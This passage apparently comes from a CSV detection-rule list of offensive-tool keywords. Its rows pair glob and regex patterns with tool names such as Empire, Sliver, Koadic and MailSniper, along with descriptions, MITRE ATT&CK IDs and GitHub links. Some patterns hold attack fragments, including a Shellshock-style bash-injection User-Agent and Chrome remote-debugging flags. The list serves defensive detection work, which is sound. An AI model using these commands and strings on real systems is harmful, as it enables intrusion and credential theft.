safetykatz*",".{0,1000}use\ssafetykatz.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","10","2138","405","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z" "*use scanner/smb/smb_enum_gpp*",".{0,1000}use\sscanner\/smb\/smb_enum_gpp.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*use scanner/ssh/ssh_enumusers*",".{0,1000}use\sscanner\/ssh\/ssh_enumusers.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","1","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*use stager/*",".{0,1000}use\sstager\/.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*UseBeaconCmd*",".{0,1000}UseBeaconCmd.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*uselistener dbx*",".{0,1000}uselistener\sdbx.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*uselistener onedrive*",".{0,1000}uselistener\sonedrive.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*usemodule persistence/*",".{0,1000}usemodule\spersistence\/.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*usemodule powershell/persistence*",".{0,1000}usemodule\spowershell\/persistence.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*usemodule privesc/*",".{0,1000}usemodule\sprivesc\/.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*useplugin csharpserver*",".{0,1000}useplugin\scsharpserver.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*UsePrtAdminAccount*",".{0,1000}UsePrtAdminAccount.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2810","550","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "*UsePrtImperonsationAccount*",".{0,1000}UsePrtImperonsationAccount.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2810","550","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "*user aborted during DBMS fingerprint.*",".{0,1000}user\saborted\sduring\sDBMS\sfingerprint\..{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Web Attacks","https://github.com/r0oth3x49/ghauri","1","0","#contentstrings","8","10","2374","235","2024-04-25T12:17:16Z","2022-10-01T11:21:50Z" "*user Inveigh*",".{0,1000}user\sInveigh.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-InveighRelay.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*--user orbitaldump*",".{0,1000}\-\-user\sorbitaldump.{0,1000}","offensive_tool_keyword","orbitaldump","A simple multi-threaded distributed SSH brute-forcing tool written in Python.","T1110","TA0006","N/A","N/A","Exploitation tools","https://github.com/k4yt3x/orbitaldump","1","0","N/A","N/A","5","453","89","2022-10-30T23:40:57Z","2021-06-06T17:48:19Z" "*user_eq_pass_valid_cme_*.txt*",".{0,1000}user_eq_pass_valid_cme_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*--user_file*--password_file*",".{0,1000}\-\-user_file.{0,1000}\-\-password_file.{0,1000}","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","1","N/A","N/A","4","325","56","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z" "*user_password.rb*",".{0,1000}user_password\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*user_to_secretsdump.py*",".{0,1000}user_to_secretsdump\.py.{0,1000}","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","9","2","100","10","2024-01-30T14:28:59Z","2023-09-05T12:13:47Z" "*user|username|login|pass|password|pw|credentials*",".{0,1000}user\|username\|login\|pass\|password\|pw\|credentials.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","3198","550","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z" "*User-Agent: *echo; echo; /bin/bash -c *",".{0,1000}User\-Agent\:\s.{0,1000}echo\;\secho\;\s\/bin\/bash\s\-c\s.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","N/A","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*--user-data-dir=C:\\chrome-dev-profile23 --remote-debugging-port=9222*",".{0,1000}\-\-user\-data\-dir\=C\:\\\\chrome\-dev\-profile23\s\-\-remote\-debugging\-port\=9222.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*UserEnum*",".{0,1000}UserEnum.{0,1000}","offensive_tool_keyword","UserEnum","The three scripts provided here allow one to establish if a user exist on a Windows domain. without providing any authentication. These user enumeration scripts use the DsrGetDcNameEx2.CLDAP ping and NetBIOS MailSlot ping methods respectively to establish if any of the usernames in a provided text file exist on a remote domain controller.","T1210.001 - T1213 - T1071.001","TA0007 - TA0002 - TA0003","N/A","N/A","Information Gathering","https://github.com/sensepost/UserEnum","1","1","N/A","N/A","3","211","47","2023-11-02T12:55:25Z","2018-05-21T16:55:58Z" "*UserHunterImplant*",".{0,1000}UserHunterImplant.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*Username to use for ADWS Connection. Format: domain\\user or user@domain*",".{0,1000}Username\sto\suse\sfor\sADWS\sConnection\.\sFormat\:\sdomain\\\\user\sor\suser\@domain.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","N/A","8","6","558","57","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z" "*username-anarchy *",".{0,1000}username\-anarchy\s.{0,1000}","offensive_tool_keyword","username-anarchy","Tools for generating usernames when penetration testing. Usernames are half the password brute force problem.","T1110 - T1134 - T1078","TA0006","N/A","N/A","Credential Access","https://github.com/urbanadventurer/username-anarchy","1","0","N/A","N/A","7","680","120","2024-02-28T16:57:48Z","2012-11-07T05:35:10Z" "*UsernameAsPasswordCreds.txt*",".{0,1000}UsernameAsPasswordCreds\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*userpass_cme_check*",".{0,1000}userpass_cme_check.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*userpass_kerbrute_check*",".{0,1000}userpass_kerbrute_check.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*UserPassBruteForce*",".{0,1000}UserPassBruteForce.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","N/A","Persistence","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","2082","347","2024-03-18T00:51:32Z","2016-08-18T15:05:13Z" "*users/public/troubleshooting_log.log*",".{0,1000}users\/public\/troubleshooting_log\.log.{0,1000}","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","0","N/A","9","1","10","1","2023-10-08T23:31:33Z","2023-07-01T17:59:20Z" "*users\\public\\elevationstation.js*",".{0,1000}users\\\\public\\\\elevationstation\.js.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","4","332","47","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z" "*users\\usethis\\NewFile.txt*",".{0,1000}users\\\\usethis\\\\NewFile\.txt.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","4","332","47","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z" "*users\public\example.bin*",".{0,1000}users\\public\\example\.bin.{0,1000}","offensive_tool_keyword","forkatz","credential dump using foreshaw technique using SeTrustedCredmanAccessPrivilege","T1003.002 - T1558.002 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/Barbarisch/forkatz","1","0","N/A","10","2","125","16","2021-05-22T00:23:04Z","2021-05-21T18:42:22Z" "*users\public\temp.bin*",".{0,1000}users\\public\\temp\.bin.{0,1000}","offensive_tool_keyword","forkatz","credential dump using foreshaw technique using SeTrustedCredmanAccessPrivilege","T1003.002 - T1558.002 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/Barbarisch/forkatz","1","0","N/A","10","2","125","16","2021-05-22T00:23:04Z","2021-05-21T18:42:22Z" "*users_asreproast.txt*",".{0,1000}users_asreproast\.txt.{0,1000}","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","1","AD Enumeration","7","1","44","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" "*users_dcsrp_full.txt*",".{0,1000}users_dcsrp_full\.txt.{0,1000}","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","1","AD Enumeration","7","1","44","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" "*users_kerberoasting.txt*",".{0,1000}users_kerberoasting\.txt.{0,1000}","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","1","AD Enumeration","7","1","44","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" "*users_list_cme_ldap_nullsess_*",".{0,1000}users_list_cme_ldap_nullsess_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*users_list_kerbrute_*",".{0,1000}users_list_kerbrute_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*users_list_ridbrute_*",".{0,1000}users_list_ridbrute_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*users_no_req_pass.txt*",".{0,1000}users_no_req_pass\.txt.{0,1000}","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","1","AD Enumeration","7","1","44","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" "*users_no_req_pass_full.txt*",".{0,1000}users_no_req_pass_full\.txt.{0,1000}","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","1","AD Enumeration","7","1","44","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" "*Uses eBPF to dump secrets use by PAM (Authentication) module*",".{0,1000}Uses\seBPF\sto\sdump\ssecrets\suse\sby\sPAM\s\(Authentication\)\smodule.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*usestager 